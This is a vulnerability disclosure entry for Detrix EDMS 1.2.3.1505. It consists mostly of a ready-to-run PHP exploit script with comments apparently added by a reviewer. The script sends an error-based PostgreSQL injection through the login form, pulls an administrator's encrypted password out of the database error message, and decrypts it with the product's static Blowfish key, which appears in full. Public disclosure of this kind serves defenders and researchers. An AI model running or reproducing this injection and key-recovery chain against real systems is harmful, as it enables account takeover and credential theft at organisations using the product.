Detrix EDMS 1.2.3.1505 SQL Injection

2019.10.03
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

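#!/usr/bin/php
<?php
/*
 * Exploit Title: Detrix EDMS cleartext user password remote SQLI exploit
 * Google Dork:
 * Date: Jul 2019
 * Exploit Author: Burov Konstantin
 * Vendor Homepage: forum.detrix.kz
 * Software Link: https://www.documentov.com/index.php?route=document/search&search=1.2.3.1505.zip&page=1&limit=20&document_uid=3d7bae5a-c2e5-11e8-9ed8-b7ed7eb0f5bb
 * Version: any
 * Tested on: Detrix 1.2.3.1505
 *
 * NOTE(review): this header originally sat before the `<?php` tag, so PHP
 * printed it to stdout on every run; it now lives inside the PHP block.
 *
 * What the script does: sends one POST to the target's login form whose
 * `login` field carries an error-based PostgreSQL injection, pulls the
 * Blowfish-encrypted password of the row at offset $user_id out of the
 * database error text, and decrypts it with the static key the product ships.
 */

declare(strict_types=1);

/*---------------------------CHANGE-ME--------------------------------*/
$URL = "http://192.168.56.6"; // Set URL for the target host
$user_id = 0;                 // 0 - Default admin ID
/*--------------------------------------------------------------------*/

$banner = "Exploiting SQLi vuln and password decrypting for Detrix\n"
    . "http://forum.detrix.kz\nhttps://github.com/sadshade/Detrix-Passwords-PoC \n"
    . "sad.2.shade@mail.com, 2019.\n\n";

// Injection payload. The password cell is wrapped in `a__ ... __a` and cast to
// NUMERIC; that cast fails, and the server's "invalid input syntax for type
// numeric" message (presumably reflected into the response) carries the value
// back verbatim. $user_id is coerced to int so nothing else can be spliced in.
$user_id = (int) $user_id;
$sql_req = "login' AND 99=CAST('a__'||(SELECT COALESCE(CAST(password AS "
    . "CHARACTER(10000)),(CHR(32))) FROM manuscript.ref_system_users OR"
    . "DER BY id OFFSET " . $user_id . " LIMIT 1)::text||'__a' "
    . "AS NUMERIC) AND 'a'='a";

$data = ['password' => 'pass', 'login' => $sql_req];
$options = [
    'http' => [
        'header'  => "Content-type: application/x-www-form-urlencoded\r\n",
        'method'  => 'POST',
        'content' => http_build_query($data),
        // Keep the body of 4xx/5xx responses too: the leaked value arrives in a
        // database error page, which a server may well not serve with HTTP 200.
        // Without this flag file_get_contents() returns false on such statuses.
        'ignore_errors' => true,
    ],
];

// Static Blowfish key from %detrix%/system/utils/MSF_string.php. It is the same
// on every install, which is what makes the stored passwords recoverable.
// Single-quoted so the `$%` / `$9` sequences are unambiguously literal.
$sSuperDuperSecretKey = '!-eeflslskdjfla;456864~}{fjkdlswkfkll@#$%#$9f0sf8a723#@';

echo $banner;

$context = stream_context_create($options);
echo "Send SQLi to $URL...\n";
// file_get_contents() does not throw: it returns false (plus a warning) on
// failure, so a try/catch around it never fires. Test the return value instead.
$result = file_get_contents($URL, false, $context);
if ($result === false || $result === '') {
    echo "Error: empty Response or error!\n";
    exit(1);
}

// The error text quotes the wrapped value, e.g. "a__<base64>__a".
// NOTE(review): if the application HTML-escapes the error page the quotes
// become &quot; and this pattern will not match — confirm against a live target.
if (preg_match("/\"a__(.+)__a\"/", $result, $encrypted_pass) !== 1) {
    echo "Error: no such User id:$user_id or empty password!\n";
    exit(1);
}

// Blowfish-ECB, raw output, no padding removal (OPENSSL_ZERO_PADDING); the
// vendor's padding is stripped afterwards with trim(), as the original did.
// openssl_decrypt() returns false on a bad key/ciphertext — report it rather
// than silently printing an empty password.
$raw = openssl_decrypt(
    base64_decode($encrypted_pass[1]),
    "BF-ECB",
    $sSuperDuperSecretKey,
    OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING
);
if ($raw === false) {
    echo "Error: decryption failed (wrong key or corrupted ciphertext)\n";
    exit(1);
}
$clear_pass = trim($raw);
echo "Pass for User id $user_id: $clear_pass \n";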

